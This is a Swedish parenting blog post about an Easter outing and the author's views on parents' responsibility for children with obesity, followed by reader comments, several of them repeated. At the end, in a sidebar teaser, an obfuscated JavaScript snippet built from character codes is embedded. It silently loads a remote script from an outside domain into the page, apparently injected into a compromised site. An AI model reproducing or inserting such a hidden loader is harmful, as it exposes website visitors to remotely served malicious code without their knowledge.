Feta barn! Rätt eller fel? Vad har vi för ansvar som föräldrar?

imageHej! Visst är det underbart med röd dag idag. Vi njuter utav ledigheten och kvalitetstiden. Igår firade i våran påskafton. Jag Lilleman och morfar. Jag är så glad över deras relation! Pappa/morfar är grym som hjälper mig just nu…. förklarar i ett senare inlägg… Vi promenerade i mysiga Sigtuna. Gick och åt en middag…imageimageimageVad är det med ”killar emellan” Morfar och Ludvig har en helt annan dialog än vi. Dom snackar sitt ”egna” språk på något vis… Lilleman fick påskpresent utav morfar. Han fick lego. Ludvig är verkligen sååå duktig på lego. han bygger satser med rekommendation från 6-9år, utan problem. Morfar fick igenom ritningen och förklarade att man måste följa steg för steg, sida för sida. Han gör det helt själv och försvinner in i sin egna lilla värld när han är i sitt lego bygge. Tålamodet vet jag inte vart det kommer ifrån, för varken jag eller hans pappa har något tålamod! hehe!

Imorse tog vi sovmorgon. Vi vaknade strax efter 08:00 och tog en liten prommis med vovven innan vi gjorde en mysfrukost. Lilleman ville ha köttbullssmörgås, ägg, yoggi, frukt m.m. Visst! Jag är nöjd sålänge han äter. DET gör han verkligen, han äter som en fullvuxen man! Men han är ju normalviktig och följer sin kurva så det spelar ju ingen roll…. image

Det här med vikt på barn. Överviktiga, underviktiga…. ja alla barn är såklart JÄTTE viktiga.

Jag skulle inte älska Ludvig mer eller mindre pga utav hans vikt. Men jag blev väldigt illa berörd häromdagen. 

Jag satt på ett fik, då jag satt brevid en normal familj. BÅDA barnen var kraftigt överviktiga. Rent av feta.

Alltså ohälsosamt överviktiga som också påverkar hälsan i det långa loppet. Jag känner inte denna familjen, jag har ingen aning om vad som ligger bakom eller hur deras vardag ser ut.

På bordet framför dom stod det bakelser, kakor, läsk, OCH godis! Någonstans anser jag att man ändå som förälder har ett ansvar! Där man ska se till att jobba på problemen.

För i just detta fallet så var deras ungars vikt ett stort problem. Fetma som kommer påverka deras hälsa grymt negativt om dom inte gör någonting åt det.

Sen är det ju också så att ungdomar och barn dessutom är elaka mot varandra i skolan. Mobbning förekommer allt för ofta och med denna fetman som jag såg så kan jag utan att vara insatt i deras liv/situation misstänka att det kan förekomma mobbning och taskiga kommentarer pga utav detta…. Sorgligt!

Vad anser du? Om barnen  går upp kraftigt i vikt skulle du som förälder blunda för det?

Jag skulle puscha för mer aktivitet och hålla efter kosten rejält. Inte ta bort allt såklart, men se till att på ett sunt och hälsosamt sätt se till att det inte skenar iväg för långt… FullSizeRender 4IMG_5561IMG_5556Nu ska vi ut och leka i naturen… Vädret är verkligen underbart!! Önskar dig en skön dag!

Kramar / My Martens

27 Komentarer

 1. Tycker verkligen att det är vårt ansvar det här med barns vikt och hälsa. Det är rått, elakt och i mina ögon, dålig föräldraskap att inte ta hand om sina barn bättre än så. Man förstör deras framtid, bidrar med mobbing och skapar ett dåligt självförtroende hos de. Mat är något man äter för att överleva, inte något man ska vräka i sig som en hobby. Jag tycker du har sunda tankar.

 2. Tycker verkligen att det är vårt ansvar det här med barns vikt och hälsa. Det är rått, elakt och i mina ögon, dålig föräldraskap att inte ta hand om sina barn bättre än så. Man förstör deras framtid, bidrar med mobbing och skapar ett dåligt självförtroende hos de. Mat är något man äter för att överleva, inte något man ska vräka i sig som en hobby. Jag tycker du har sunda tankar.

 3. Kan säga att då jag jobbar som BVC-sköterska så är detta ett VÄÄÄÄÄÄLDIGT känsligt ämne!! Och konstigt nog så äter dessa barn ALDRIG något fika, godis eller andra onyttigheter! fast det är så uppenbart att de ofta gör det…(såvida man ej har ämnesomsättningsproblem osv). Väldigt sällan man möter föräldrar som ärligt säger ”ja du har rätt, det har blivit för mkt onyttigheter- vi får skärpa oss”. Vi på BVC tar inte upp barnens vikt för att alla ska vara pinnsmala utan för att övervikt leder till bland annat följdsjukdomar men det är såååå tabu som du säger! Alla vill väl sina barn väl och det är nog därför det är svårt att säga nej till det där godiset, den extra portionen för vem vill neka sitt barn!? Men man ser då tyvärr inte sitt barns bästa längre fram i tiden i ett större perspektiv.. Svårt det här, bra ämne!

 4. Kan säga att då jag jobbar som BVC-sköterska så är detta ett VÄÄÄÄÄÄLDIGT känsligt ämne!! Och konstigt nog så äter dessa barn ALDRIG något fika, godis eller andra onyttigheter! fast det är så uppenbart att de ofta gör det…(såvida man ej har ämnesomsättningsproblem osv). Väldigt sällan man möter föräldrar som ärligt säger ”ja du har rätt, det har blivit för mkt onyttigheter- vi får skärpa oss”. Vi på BVC tar inte upp barnens vikt för att alla ska vara pinnsmala utan för att övervikt leder till bland annat följdsjukdomar men det är såååå tabu som du säger! Alla vill väl sina barn väl och det är nog därför det är svårt att säga nej till det där godiset, den extra portionen för vem vill neka sitt barn!? Men man ser då tyvärr inte sitt barns bästa längre fram i tiden i ett större perspektiv.. Svårt det här, bra ämne!

 5. Jag tycker helt klart att det är föräldrarnas/vuxnas ansvar att visa, lära barnen hur man ska äta och absolut inte servera det som du beskrev att barnen hade framför sig. Godis, kakor, läsk m.m kan man äta någon gång på helgen. Sen ska det va en balansgång oxå. Tänker på tex tjejer som kan få en snevriden bild och lätt utvecklar anorexi eller andra ätstörningar.

 6. Viktigt och svårt ämne du tar upp.
  Jag har varit överviktig hela barndomen och kan inte minnas att mina föräldrar försökt göra nåt åt det. Först i 20 årsåldern tog jag själv med hjälp av en pt tag i detta problem och verkligen lärde mej äta rätt och lärde mej älska att röra på mej. Jag gick ner 12 kg och har sedan dess (10 år senare) legat mer eller på den vikten. Jag är inte pinnsmal och kommer så aldrig bli, får alltid akta mej vad jag äter och ska inte släppa för lösa tyglar på mina ”regler” (känner mycket igen mej med vad du brukar skriva om dej själv My). Min dotter har ärvt mina anlag. Hon är inte tjock men inte heller pinnsmal. Hon älskar allt gott och är en mera stilla tjej som inte hänger ute i träd eller springer omkring i onödan. En svår ekvation för att ge henne balans vad gäller kost och motion utan att ge henne skuldkänslor eller i värsta fall ätstörningar men ändå få henne att förstå…

  • Ja verkligen, det är ett känsligt ämne. Jag förstår vad du skriver… Svårt, läge det där. Mitt personliga råd, UTAN att vara professionell är att smyga in ”nyttigare” alternativ… utan att göra en grej av det. Att äta nyttigt behöver inte vara tråkigt ? Men jag vet hur lätt jag skenar iväg i vikt. 13 kg från september till februari. Försöka att göra små förändringar, som i det långa loppet ger stora resultat och duscha för aktivitet och vardags motion. Gör det tills en rolig grej. Nu vet jag inte hur ni lever, eller vad ni tycker om att äta/göra… -Lycka till! Kramar

 7. Jag tycker helt klart att det är föräldrarnas/vuxnas ansvar att visa, lära barnen hur man ska äta och absolut inte servera det som du beskrev att barnen hade framför sig. Godis, kakor, läsk m.m kan man äta någon gång på helgen. Sen ska det va en balansgång oxå. Tänker på tex tjejer som kan få en snevriden bild och lätt utvecklar anorexi eller andra ätstörningar.

 8. Viktigt och svårt ämne du tar upp.
  Jag har varit överviktig hela barndomen och kan inte minnas att mina föräldrar försökt göra nåt åt det. Först i 20 årsåldern tog jag själv med hjälp av en pt tag i detta problem och verkligen lärde mej äta rätt och lärde mej älska att röra på mej. Jag gick ner 12 kg och har sedan dess (10 år senare) legat mer eller på den vikten. Jag är inte pinnsmal och kommer så aldrig bli, får alltid akta mej vad jag äter och ska inte släppa för lösa tyglar på mina ”regler” (känner mycket igen mej med vad du brukar skriva om dej själv My). Min dotter har ärvt mina anlag. Hon är inte tjock men inte heller pinnsmal. Hon älskar allt gott och är en mera stilla tjej som inte hänger ute i träd eller springer omkring i onödan. En svår ekvation för att ge henne balans vad gäller kost och motion utan att ge henne skuldkänslor eller i värsta fall ätstörningar men ändå få henne att förstå…

  • Ja verkligen, det är ett känsligt ämne. Jag förstår vad du skriver… Svårt, läge det där. Mitt personliga råd, UTAN att vara professionell är att smyga in ”nyttigare” alternativ… utan att göra en grej av det. Att äta nyttigt behöver inte vara tråkigt 😉 Men jag vet hur lätt jag skenar iväg i vikt. 13 kg från september till februari. Försöka att göra små förändringar, som i det långa loppet ger stora resultat och duscha för aktivitet och vardags motion. Gör det tills en rolig grej. Nu vet jag inte hur ni lever, eller vad ni tycker om att äta/göra… -Lycka till! Kramar

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/